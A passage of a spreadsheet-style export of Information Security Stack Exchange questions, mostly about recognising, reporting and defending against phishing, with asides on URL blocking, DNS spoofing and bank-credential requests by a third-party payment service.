 &lt;p&gt;But I don't know how this has happened. I do not know where it is happening. What the best practice here? How can I check what has happened and stop it?&lt;/p&gt;
 &lt;p&gt;EDIT: My host said now that he wasn't sure it was wordpress, but was suspecting it. Do I really need to delete everything and reinstall. This is over 10 sites, and it will be a lot of work.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;incident-response&gt;&lt;forensics&gt;&lt;wordpress&gt;</t>
  </si>
  <si>
    <t>PayPal is asking for my Bank Details. How secure is this?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am from the UK but I'm living in Poland. I have two British bank accounts and a Polish account. The two British accounts are linked to a PayPal account registered from the UK and the Polish one is linked to an account made in Poland. Today I could not add instant funds to my Polish PayPal without using a third party (Trustly) who requested my &lt;strong&gt;internet banking credentials&lt;/strong&gt; in order to verify my transaction. I have not been asked this with my British accounts. There is no information on PayPal (English or Polish) nor from my banks about this procedure being added. I was definitely on Paypal.pl and not a phishing site.&lt;/p&gt;
 &lt;p&gt;This got me wondering a few things:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;Why does the PayPal process suddenly require my bank credentials and why have their customers not been informed of this change? To reiterate, nowhere on Paypal's English or Polish language site does it mention this change, nor does anyone from my bank know about it. They encouraged me to sever all ties with PayPal over this, as technically a financial organisation requesting your bank details is illegal under a certain EU law. Couldn't find that online, though, so take that with a pinch of salt. &lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Is such a system secure? Everything we learn about internet security and indeed everything I've learned in life is to trust as little people as possible. I went with the bank I'm using in Poland &lt;em&gt;because&lt;/em&gt; they offer a higher level of verification for internet banking than the others.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;As a developer myself, I'm guessing they'll scrape the online bank site to verify the credentials I provided are correct as a sort of verification system. The thing is, PayPal did this in the form of a small deposit that we enter the amount for. Why is the third party asking for a more trusting approach than PayPal themselves? Doesn't this seem odd? PayPal are essentially asking us to trust a third party more than themselves, which makes me quite uncomfortable.&lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;What are your thoughts on this? Is it secret? Is it safe? Why have PayPal been quiet about it? Why not Britain as well? I wouldn't trust PayPal with my bank details, so why would I trust a third party I've never heard of before? There is so much about this that seems very suspicious to me. I was quite convinced I'd found my way onto a phishing site because it was hard to believe they wanted my credentials.&lt;/p&gt;
 &lt;p&gt;-- Edit with additional information:&lt;/p&gt;
 &lt;p&gt;The certificate on Paypal.com is indeed PayPals, verified by Symantec, etc. 
 The website PayPal directs to when trying to add Instant Funds is Paypal-Doladowania.pl. In Polish, Doladowania means "Adding Funds" in this context. The HTTPS certificate is registered Paypal PTE Ltd, verified by DigiCert, registered in Singapore. No EV on either sites.&lt;/p&gt;
 &lt;p&gt;Here's a picture of the Trustly page asking for my credentials. In English it says "Please enter the identification credentials for your online banking." &lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/GqyCi.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/GqyCi.png" alt="A screenshot of the page asking for bank details"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;If I enter some numbers (I just mashed the keys) they then ask me to do this:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/ZUiHH.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/ZUiHH.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Which is the partial password system this particular bank is using. So login to your bank account through a third party... I don't think so.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;internet&gt;&lt;banks&gt;&lt;paypal&gt;</t>
  </si>
  <si>
    <t>Network provider blocking URL, even though connection made to IP</t>
  </si>
  <si>
    <t>&lt;p&gt;I came across an interesting case today, which with my limited knowledge I'm unable to understand the working of. &lt;/p&gt;
 &lt;p&gt;I was trying to access a &lt;code&gt;bit.ly&lt;/code&gt; link, but it is blocked by my University. &lt;/p&gt;
 &lt;p&gt;Knowing a bit of HTTP requests and basic network stuff, I initially suspected a DNS block. But even after changing to google DNS, I was getting the blocked page error. &lt;/p&gt;
 &lt;p&gt;I used nslookup, both from my command line as well as a web utility, and got one of the servers as &lt;code&gt;67.199.248.10&lt;/code&gt;. &lt;/p&gt;
 &lt;p&gt;I used chrome to inspect the request, and indeed, the domain was being resolved to that IP. &lt;/p&gt;
 &lt;p&gt;I even used curl on my local machine, and got this output:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;$ curl bit.ly -v
 * Rebuilt URL to: bit.ly/
  % Total % Received % Xferd Average Speed Time Time Time Current
  Dload Upload Total Spent Left Speed
  0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 67.199.248.10...
 * TCP_NODELAY set
 * Connected to bit.ly (67.199.248.10) port 80 (#0)
 &amp;gt; GET / HTTP/1.1
 &amp;gt; Host: bit.ly
 &amp;gt; User-Agent: curl/7.56.1
 &amp;gt; Accept: */*
 &amp;gt;
 &amp;lt; HTTP/1.1 403 Forbidden
 &amp;lt; Content-Type: text/html; charset="utf-8"
 &amp;lt; Content-Length: 1272
 &amp;lt; Connection: Close
 &amp;lt;
 { [1272 bytes data]
 100 1272 100 1272 0 0 1272 0 0:00:01 --:--:-- 0:00:01 5412&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"&amp;gt;
 &amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"&amp;gt;&amp;lt;style type="text/css"&amp;gt;html,body{height:100%;padding:0;margin:0;}.oc{display:table;width:100%;height:100%;}.ic{display:table-cell;vertical-align:middle;height:100%;}div.msg{display:block;border:1px solid #30c;padding:0;width:500px;font-family:helvetica,sans-serif;margin:10px auto;}h1{font-weight:bold;color:#fff;font-size:14px;margin:0;padding:2px;text-align:center;background: #30c;}p{font-size:12px;margin:15px auto;width:75%;font-family:helvetica,sans-serif;text-align:left;}
 &amp;lt;/style&amp;gt;
 &amp;lt;title&amp;gt;The URL you requested has been blocked&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;
 &amp;lt;body&amp;gt;
 &amp;lt;div class="oc"&amp;gt;
 &amp;lt;div class="ic"&amp;gt;
 &amp;lt;div class="msg" style="text-align: center"&amp;gt;&amp;lt;img src=https://www.hku.hk/f/page/7561/basic_logo_20.jpg alt="The University of Hong Kong"&amp;gt;&amp;lt;/img&amp;gt;&amp;lt;h1&amp;gt;The URL you requested has been blocked &amp;lt;/h1&amp;gt;&amp;lt;p&amp;gt;The webpage you have requested has been blocked, because the page was reported as containing phishing material. &amp;lt;br&amp;gt;Please refer to &amp;lt;a href="http://www.its.hku.hk/spam-report"&amp;gt;HKU Spam report &amp;lt;/a&amp;gt; or contact &amp;lt;a href="mailto:ithelp@hku.hk"&amp;gt;ithelp@hku.hk&amp;lt;/a&amp;gt; if you have further enquiry.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;URL = bit.ly/&amp;lt;br /&amp;gt;&amp;lt;/p&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;
 * Closing connection 0
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Now, I am very curious about one thing: If I am able to establish a connection, (it says I am connected to the IP at the given port), how is the University coming in between? Is it some kind of firewall which sees:&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;If (coming from bit.ly IP) =&amp;gt; {Replace HTML with our- block page}&lt;/code&gt;? &lt;/p&gt;
 &lt;p&gt;This is my closest guess, since on HTTPS I get Invalid Certificate. 
 Just wondering how it's happening, answers or even guesses would be appreciated.&lt;/p&gt;
 &lt;p&gt;Edit: A traceroute as well:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Tracing route to bit.ly [67.199.248.10]
 over a maximum of 30 hops:
  1 1 ms &amp;lt;1 ms &amp;lt;1 ms 147.8.121.200
  2 11 ms 3 ms 2 ms 147.8.240.57
  3 6 ms 1 ms 2 ms 147.8.240.65
  4 &amp;lt;1 ms &amp;lt;1 ms &amp;lt;1 ms 147.8.240.121
  5 &amp;lt;1 ms &amp;lt;1 ms &amp;lt;1 ms 147.8.239.8
  6 1 ms 1 ms 1 ms 203.188.117.1
  7 2 ms 2 ms 2 ms 165084185137.ctinets.com [165.84.185.137]
  8 2 ms 2 ms 2 ms 202.4.163.3
  9 3 ms 2 ms 2 ms 014136142018.ctinets.com [14.136.142.18]
  10 3 ms 3 ms 3 ms ix-ge-9-0-0.core1.undefined.as6453.net [180.87.160.33]
  11 7 ms 4 ms 3 ms if-ge-4-1-0.hcore1.h71-hong-kong.as6453.net [180.87.160.102]
  12 4 ms 3 ms 3 ms if-ae-38-2.tcore1.hk2-hong-kong.as6453.net [116.0.67.86]
  13 4 ms 4 ms 3 ms 116.0.67.194
  14 3 ms 3 ms 3 ms po110.bs-b.sech-hkg2.netarch.akamai.com [72.52.2.184]
  15 4 ms 3 ms 3 ms ae121.access-a.sech-hkg2.netarch.akamai.com [72.52.2.189]
  16 307 ms 326 ms 349 ms 93.191.173.93
  17 152 ms 152 ms 152 ms a72-52-42-132.deploy.static.akamaitechnologies.com [72.52.42.132]
  18 * * 151 ms ae5.cbs01.eq01.sjc02.networklayer.com [50.97.17.72]
  19 150 ms 150 ms 150 ms e1.11.6132.ip4.static.sl-reverse.com [50.97.17.225]
  20 150 ms 151 ms 150 ms po1.fcr01b.sjc03.networklayer.com [169.45.118.135]
  21 150 ms 150 ms 150 ms 67.199.248.10
 Trace complete.
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;tls&gt;&lt;http&gt;&lt;firewalls&gt;&lt;ip&gt;&lt;curl&gt;</t>
  </si>
  <si>
    <t>How could a scammer know the apps on my phone / iTunes account?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email with the subject "&lt;strong&gt;Your invoice from Apple #xxxxx&lt;/strong&gt;".
 It then continues by: "[...] your payment from "Pokemon Go was accepted [...]". That line made me sceptical. I just downloaded the app recently. How could the scammer know this? Was it just a good guess?
 &lt;br&gt;&lt;br&gt;
 I assume it to be scam since:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;The sender is surpressed&lt;/li&gt;
 &lt;li&gt;Typos&lt;/li&gt;
 &lt;li&gt;No Username / data&lt;/li&gt;
 &lt;li&gt;Generic text&lt;/li&gt;
 &lt;li&gt;A suspicious little pdf&lt;/li&gt;
 &lt;li&gt;Not the signature / style from your friendly, expensive fruit seller tech company&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;&lt;a href="https://www.onlinewarnungen.de/warnungsticker/vorsicht-phishing-your-apple-id-has-been-locked-for-security/" rel="noreferrer"&gt;Some online warning sites already caught up on it&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;What I could think of:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Another free app reports my other apps to the vendor&lt;/li&gt;
 &lt;li&gt;A site I often visit has cookies that I was looking up stuff from &lt;code&gt;let's go pikachu&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;My account could actually be compromized and someone has access to my records &lt;/li&gt;
 &lt;li&gt;Many people have the app installed
 &lt;br&gt;
 If only a fraction of the people who have the app open the attached pdf the scammer wins.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Anyway, how could this be and what counter messurements can I apply?&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to provide personal User Page after User already signed up without Password?</t>
  </si>
  <si>
    <t>&lt;p&gt;I created a small website where participants can sign up with some data (name, email, birthdate, ...) but they don't have to set username and password.&lt;/p&gt;
 &lt;p&gt;After a while it would be useful to provide some kind of overview site (of course not showing any personal data) for each user. Now I'm thinking about different ways how to achieve that:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Sending each User a personal URL (e.g. mydomain.com/LongAndUniqueRandomString) without login.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;PRO: less overhead, less security issues&lt;/li&gt;
 &lt;li&gt;CON: public to everyone else who has the URL, bad email practice as it behaves like phishing spam&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Implementing a login and send each User his personal (predefined) Password&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;PRO: better privacy&lt;/li&gt;
 &lt;li&gt;CON: no save way to provide password to the user&lt;/li&gt;
 &lt;/ul&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;What do you think?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;user-management&gt;</t>
  </si>
  <si>
    <t>Blocking Business Email Compromise (BEC) emails</t>
  </si>
  <si>
    <t>&lt;p&gt;I am recieving phishing emails like the one depicted below, with the sender being 
 a legit member of our organization. How can I block this kind of email? What should be done? Is malwarebytes capable of detecting the issue?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/2fwyW.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/2fwyW.png" alt="Phishing mail."&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>Forcepoint secure email</t>
  </si>
  <si>
    <t>&lt;p&gt;I just got an email from a financial institution in answer to a question I raised with them. It came in the form of a "secure email" from Forcepoint, which requires you to open an HTML document and click on a link contained within. The document has an encrypted block of code in it which I presume is used in the process of creating the link / communicating with the remote server.&lt;/p&gt;
 &lt;p&gt;The link then gave me a registration form to fill in including a password and security question. I generated a random password and bogus answer for this purpose as I would always do.&lt;/p&gt;
 &lt;p&gt;After that I got another link by email which gave me the answer to my original question. &lt;/p&gt;
 &lt;p&gt;The whole process had a bad smell to it, including the dodgy-looking domain names involved ("voltage-pp-0000.secure-mailcontrol.com" - really?).&lt;/p&gt;
 &lt;p&gt;What's the security advantage of this, if any? Requiring you to click on an attachment seems like a really bad idea. I only followed the instructions because the context was such that I knew it was very unlikely to be a phishing attempt and none of the information asked for would be of any use if it were.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;security-theater&gt;</t>
  </si>
  <si>
    <t>Practical ways to protect against Cyber Pearl Harbor?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;What practical methods should citizens be using to protect themselves against, and reduce the impact of an attack against critical national infrastructure&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;A lot of recent news about critical network infrastructure under DDoS attacks, for example GoDaddy. Furthermore with the discovery of APTs like Stuxnet and flame the danger of cyber war is beginning. The U.S. Defense Secretary said that if we don't secure our computer systems and networks they will be on the way to destruction. So I'm wondering, what practical methods should citizens be using to protect themselves against, and reduce the impact of a Cyber Pearl Harbor?&lt;/p&gt;
 &lt;p&gt;According to my threat model I divided computer systems into tiers. Each higher tier should follow everything lowers tiers do and more. The lowest is regular computer users - primarily they need to protect against becoming infected as part of a zombie botnet, but also becoming infected so that any removable media could not infect their workplaces (a higher tier priority).&lt;/p&gt;
 &lt;p&gt;Regular people:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Strong (high entropy and salted) Passwords Changed Monthly&lt;/li&gt;
 &lt;li&gt;Full Disk Encryption and External Hard Drive (reduce the attack surface to modify your computer data to one of: physical access, remote code execution..) compartmentalizing threat models. with regular backups.&lt;/li&gt;
 &lt;li&gt;Firewall and no unnecessary services: &lt;/li&gt;
 &lt;li&gt;Disable vulnerable software java and flash&lt;/li&gt;
 &lt;li&gt;HTTPS everywhere (block interception and man in the middle attacks.. make sure all devices check certificates correctly)&lt;/li&gt;
 &lt;li&gt;Tor over VPN (anonymity + privacy).&lt;/li&gt;
 &lt;li&gt;ensure wireless router is not usable for DDOS by reflection attacks&lt;/li&gt;
 &lt;li&gt;Cryptographically Signed Daily Software Upgrade (protection against all patched exploits: only have to worry about 0-days).&lt;/li&gt;
 &lt;li&gt;System installer disks: If you get a virus or suspect a rootkit just wipe the computer and start again&lt;/li&gt;
 &lt;li&gt;Offline computers: A "backup" computer not connected to the internet at all&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Businesses:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Regular business security practices and certifications plus:&lt;/li&gt;
 &lt;li&gt;Encrypted Cloud Services: check that cloud computer services you use encrypt so that they cannot leak information to cyber attackers&lt;/li&gt;
 &lt;li&gt;Large scale Cooperation with LE via Counter surveillance of alien packets.&lt;/li&gt;
 &lt;li&gt;PGP encrypted emails.&lt;/li&gt;
 &lt;li&gt;2 factor Authentication to protect against phishing and social engineering.&lt;/li&gt;
 &lt;li&gt;Censorship of propaganda against for recruitment: &lt;a href="http://news.techeye.net/internet/un-report-urges-internet-strategy-against-terrorism" rel="nofollow"&gt;UN report urges internet strategy against terrorism&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;CAs: It is unknown how Certificate Authority should operate in a time of cyber war. Due to the danger of another DigiNotar it should perhaps be supported by the web of trust, also using "offline" methods such as IPoAC to issue certificate revocations.&lt;/p&gt;
 &lt;p&gt;Drones: hackers may attempt reprogram surveillance drones to operate offensively.&lt;/p&gt;
 &lt;p&gt;This is the highest priority so they will have the strictest security measures of all include the Obama "red button" to completely disable network operation of the country. Also in dire circumstances maybe assemble a "hack back" counter attack team to produce a worm which is capable of shutting down the entire worlds internet parallel to the cold war standoff?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;defense&gt;</t>
  </si>
  <si>
    <t>fake website used for phishing purposes</t>
  </si>
  <si>
    <t>&lt;p&gt;Our real web site is &lt;code&gt;www.abc.com&lt;/code&gt;. Recently Intel notified us of another web site &lt;code&gt;www.fake.com&lt;/code&gt; having some parts of the site appearing the same as our real site. This is obviously a phishing site.&lt;/p&gt;
 &lt;p&gt;Not much damage has been done and I don't think our users are stupid enough to recognize &lt;code&gt;www.fake.com&lt;/code&gt; as our real site and try to access it. However, I would like to know what are the mitigation measures we could take.&lt;/p&gt;
 &lt;p&gt;I reckon sending our users an email or a company circular to warn them that we have only one real site is a must. What else can we do to prevent?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Email sender appears to know friend's name?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received a suspicious personal email from someone whose username is the first and middle initial, and last name, of a friend. (My contact with said friend is usually via social media.) Header info indicates it originated in Vietnam and arrived via a server in Utah. &lt;/p&gt;
 &lt;p&gt;Coincidence, or change my password? I have in the past implemented weighting to identify spam, but I wonder what methodology might be used to assess this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;privacy&gt;&lt;email&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Bank of America phishing site</t>
  </si>
  <si>
    <t>&lt;p&gt;A text message was sent to my phone stating that my Bank of America account had been suspended due to suspicious activity. It then provided a link to reactivate it. Obvious phishing scam. The URL they provided was through tinyurl.com. I was curious so I went to the site.&lt;/p&gt;
 &lt;p&gt;I was surprised to find that the domain of the actual URL pointed to what seems to be a legitimate business @ &lt;a href="http://griffinconstruction.com.au" rel="nofollow noreferrer"&gt;http://griffinconstruction.com.au&lt;/a&gt;. If desired, I can provide the path to the malicious page as well. I thought it probably best to not include it here.&lt;/p&gt;
 &lt;p&gt;Doing a little research I discovered this is a wordpress site. And doing a little more research I discovered that many wordpress sites have been hacked before. On the main website page there is a Contact Us link. I have attempted to contact the owner. But I would think attempting to contact the owner of a hacked website through the website itself would be an exercise in futility.&lt;/p&gt;
 &lt;p&gt;I have reported it to Google but that seems a bit like reporting a burglary to the NSA. I don't expect much if anything to come from it. I have also contacted Bank of America to inform them.&lt;/p&gt;
 &lt;p&gt;Is there anything else I should do?&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;A little more than 24 hours later and I just received a 2nd text message. The phone number is slightly different. But it's the same country code and area code as the first message. The message itself is the same except now they're using bit.do to shorten the URL. After reading the comments I decided to check this one using an online link expander.&lt;/p&gt;
 &lt;p&gt;The bit.do URL expanded to &lt;a href="http://deichelmauspics.de/" rel="nofollow noreferrer"&gt;http://deichelmauspics.de/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Yet another hacked Wordpress site. The path of the URL leading to the phishing page is exactly the same as before.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Update #2&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://griffinconstruction.com.au" rel="nofollow noreferrer"&gt;http://griffinconstruction.com.au&lt;/a&gt; now shows:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;This Account has been suspended.&lt;/strong&gt;
 &lt;strong&gt;Contact your hosting provider for more information.&lt;/strong&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I guess that explains the 2nd message :)&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Thank you to everyone who contributed their thoughts on this&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I suppose there is no real way to know exactly what caused the website to be taken offline. But at the end of the day, the important thing is that it is in fact offline. And in my opinion, that would not have happened without the contributions from the people of Information Security Stack Exchange. That's pretty awesome.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Update #3&lt;/strong&gt;
 So it's been 8 months. I was looking at another Wordpress site today and it made me wonder what had become of the site mentioned in this question. So I went to their website and... nothing has changed. There is still a fake Bank of America page buried deep down within folders that shouldn't be publicly accessible but are. And that's just stupid and careless. I doubt that most people would fall for the Bank of America scam as it was presented in this case. But still, someone might. See for yourself.&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;MALICIOUS LINK&lt;/strong&gt; (no longer works)&lt;/p&gt;
 &lt;p&gt;&lt;code&gt;http://griffinconstruction.com.au/wp-includes/SimplePie/XML/Declaration/1&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;MALICIOUS LINK&lt;/strong&gt;&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;wordpress&gt;</t>
  </si>
  <si>
    <t>Is it illegal to DDoS a phishing page?</t>
  </si>
  <si>
    <t>&lt;p&gt;I used to go on a site called blockchain.info For storing bitcoins but today when I entered the URL I was redirected to a phishing page. I have entered all my information and it was obviously sent to the phiser well Then I have realised it was a phishing page I directly reported it to block chain and changed my password my question is. Is it illegal to ddos their site?&lt;/p&gt;
 &lt;p&gt;I live in KSA if that helps. Here is the phising page:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;http://lblockclhain.info/us/login.htm
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;ddos&gt;&lt;denial-of-service&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Known methods/techniques for thwarting credential phising attacks</t>
  </si>
  <si>
    <t>&lt;p&gt;Is the solution to preventing credential phising attacks is really only 'educating' people about it? &lt;/p&gt;
 &lt;p&gt;For the sake of this question, let us assume that I have a web application that takes a username and a password within a login form. Currently, as far as I know and could figure out, there is no way I can avoid an attacker phishing a vulnerable user of my web application into filling up a phished version of the login form prepared by an attacker. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;web-application&gt;&lt;account-security&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How easy/difficult is it to spoof DNS? Are some scenarios safer/more risky than others?</t>
  </si>
  <si>
    <t>&lt;p&gt;Practically speaking, how easy difficult is it to spoof DNS? &lt;/p&gt;
 &lt;p&gt;What scenarios are more risky than others? For example:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;A phishing email or twitter link that attracts users to click a hyperlink&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;A link on an internal sharepoint site on a different subnet&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Where a malicious user may be on the same subnet.&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;other scenarios... (please add your own) &lt;/p&gt;&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;ip-spoofing&gt;&lt;risk-management&gt;&lt;threat-modeling&gt;&lt;dns-spoofing&gt;</t>
  </si>
  <si>
    <t>How to secure SMS functionlity in web application?</t>
  </si>
  <si>
    <t>&lt;p&gt;How to secure SMS sending feature in web applications? If an application is using third party SMS gateway then SMS also can be spoofed. Like attacker can change mobile number with firebug and abuse SMS gateway to send spoof SMS like phishing message to the victim.
 How we can secure web application from this attack?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Website Marked as Phising by Edge</t>
  </si>
  <si>
    <t>&lt;p&gt;I handle a joomla website (&lt;a href="https://dom-ng.eu" rel="nofollow noreferrer"&gt;https://dom-ng.eu&lt;/a&gt;) which is marked as unsafe by Microsoft Edge but not Chrome an others. The site is flagged with a phishing threat and i tried to fix the issue but it's not working out. Now i don't know what content that cause it to happen. I added it to Bing webmaster and got links inside this &lt;a href="https://drive.google.com/open?id=1Q1dBSlpqhcoGuiHGsbGZcvuc0Kcd4AZX" rel="nofollow noreferrer"&gt;csv&lt;/a&gt;. Any ideas what is the cause?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;joomla&gt;&lt;microsoft-edge&gt;</t>
  </si>
  <si>
    <t>phishing from chrome</t>
  </si>
  <si>
    <t>&lt;p&gt;This just showed up in Chrome.&lt;/p&gt;
 &lt;p&gt;It's obviously phishing - the mangled English and weird url give it away. How would it work? Asking me for info I shouldn't give them?&lt;/p&gt;
 &lt;p&gt;My system then slowed down. Reboot asked to check files so I did.&lt;/p&gt;
 &lt;p&gt;Restarted in safe mode with network. Backed up files to another place.&lt;/p&gt;
 &lt;p&gt;McAfee status OK.&lt;/p&gt;
 &lt;p&gt;Need I worry about how they managed to hijack my NY Times page to display this?&lt;/p&gt;
 &lt;p&gt;Need I worry?&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/K2GET.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/K2GET.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>How do hackers find the ip address of router or networks they want to hack?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've heard news of hackers in different countries being able to infiltrate networks in other countries. What I'm wondering is how these hackers find the ip addresses (without the use of phishing) of the routers, networks, or devices they want to hack. (Note: I am in no way a hacker and I want to know this for purely educational purposes. Even if I did want to hack something, I am in no way smart enough to do so.)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;ip&gt;&lt;information-gathering&gt;</t>
  </si>
  <si>
    <t>Crawling for Phishing Websites</t>
  </si>
  <si>
    <t>&lt;p&gt;OBJECTIVE:
 We have a requirement to run active scan for detecting and monitor phishing websites for a particular brand.&lt;/p&gt;
 &lt;p&gt;We want to be as real-time as possible. That would mean that using sites like Phishtank would not suffice.&lt;/p&gt;
 &lt;p&gt;APPROACHES WE ARE THINKING ABOUT:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;We are thinking to do this based on some parameters including, but not limited to images, content, security certificates, etc.
 Are there any existing tools which can be worked upon or modified to run active crawling and enlisting the websites that match our phish pattern?&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Not sure if quite feasible or even possible - is to monitor public DNS Servers for new domain registrations (is this possible? How?) and crawl these websites, run our phishing detection algorithms.&lt;/p&gt;&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;UPDATE:
 I am even open to ideas to achieve the above objective.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How dangerous are phishing links really?</t>
  </si>
  <si>
    <t>&lt;ol&gt;
 &lt;li&gt;&lt;p&gt;Some phishing links contain random digits / codes (e.g: &lt;code&gt;https://refno1234.example.com&lt;/code&gt;). For such links, is there an increased risk by clicking on them because the unique code could be matched to your email / mobile number and therefore verify it exists?&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;Is it possible, by clicking on a phishing link, to run malicious scripts in the background to steal your personal data/files?&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>Counterarguments against an anti phishing procedure</t>
  </si>
  <si>
    <t>&lt;p&gt;Consider the procedure below. What are your counterarguments, related to both security and user experience?&lt;/p&gt;
 &lt;p&gt;This is a follow up on my &lt;a href="https://security.stackexchange.com/questions/153698"&gt;previous question&lt;/a&gt; on the same topic.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Step one:&lt;/strong&gt; An employee submits an e-mail to coworkers (non-internal roles are also covered):&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/mB9CR.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/mB9CR.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Step two:&lt;/strong&gt; The e-mail server intercepts all incoming mails and substitute hyperlinks to non whitelisted sites, e.g. &lt;br&gt;&lt;code&gt;surveymonkey.com/my-survey&lt;/code&gt; with &lt;br&gt;&lt;code&gt;redirect.contoso.com/surveymonkey.com/my-survey&lt;/code&gt;, and send known authors the following message:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/SCHtz.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/SCHtz.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
